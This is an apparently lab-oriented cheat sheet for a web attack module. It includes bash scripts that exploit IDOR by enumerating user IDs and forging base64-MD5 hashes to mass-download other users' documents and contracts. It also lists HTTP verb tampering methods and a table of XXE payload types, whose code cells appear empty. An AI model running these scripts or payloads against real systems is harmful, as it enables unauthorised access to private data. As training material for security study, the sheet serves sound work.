# IDOR ``` // retrieve docs #!/bin/bash url="http://SERVER_IP:PORT" for i in {1..10}; do for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "\/documents.*?.pdf"); do wget -q $url/$link done done echo -n 1 | base64 -w 0 | md5sum cdd96d3cc73d1dbdaffa03cc6cd7339b for i in {1..10}; do echo -n $i | base64 -w 0 | md5sum | tr -d ' -'; done // download contracts #!/bin/bash for i in {1..10}; do for hash in $(echo -n $i | base64 -w 0 | md5sum | tr -d ' -'); do curl -sOJ -X POST -d "contract=$hash" http://SERVER_IP:PORT/download.php done done ``` **Cheat Sheet** The cheat sheet is a useful command reference for the Web attack module. ### HTTP Verb Tampering `HTTP Method` * `HEAD` * `PUT` * `DELETE` * `OPTIONS` * `PATCH` | **Command** | **Description** | | ------------ | ------------------------- | | `-X OPTIONS` | Set HTTP Method with Curl | ### IDOR `Identify IDORS` * In `URL parameters & APIs` * In `AJAX Calls` * By `understanding reference hashing/encoding` * By `comparing user roles` | **Command** | **Description** | | ----------- | ---------------------- | | `md5sum` | MD5 hash a string | | `base64` | Base64 encode a string | ### XXE | **Code** | **Description** | | ---------------------------------------------------------------------------------- | ---------------------------------------------- | | `` | Define External Entity to a URL | | `` | Define External Entity to a file path | | `` | Read PHP source code with base64 encode filter | | `">` | Reading a file through a PHP error | | `">` | Reading a file OOB exfiltration |